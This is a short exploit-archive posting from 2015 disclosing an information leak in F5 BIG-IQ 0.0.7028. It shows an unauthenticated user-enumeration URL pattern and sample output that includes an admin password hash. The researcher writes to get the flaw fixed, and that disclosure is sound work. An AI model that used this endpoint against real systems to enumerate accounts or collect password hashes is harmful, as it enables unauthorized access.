Home / exploits BIG-IQ 0.0.7028 Information Disclosure
Posted on 06 May 2015
Hi, I'm testing BIG-IQ v 0.0.7028,( no the last HF but i don't see the bug fix in the HF1) the new mngmt of F5 BIG-IP, i see that you are loggout and join to the next link LINK : (where $user is the user) https://127.0.0.1/mgmt/shared/authz/users/$user/ When i open this link and try some diff users like invalid users like test i get a java dump with a 404 error beacuase the use folder no exist. "{"code":404,"message":"shared/authz/users/test","referer" But if you try with a valid user like admin ( by default) Yo get some details {"name":"admin","displayName":"Admin User","encryptedPassword":"$6$5wF011Sk$xTaSIc.OKXUWJQ/BftjLiPzO7yjm3./Lw3TXLJ5Sge.AJv3mkA0EJds1dMX9jeKlNHS4ha1111puBSB/s61","groupReferences":[],"generation":6,"lastUpdateMicros":1430840911116662,"kind":"shared:authz:users:usersworkerstate","selfLink":"https://localhost/mgmt/shared/authz/users/admin"} I think that is important fix it, and not display the users like a folder. Juan Pablo Lopez Yacubian
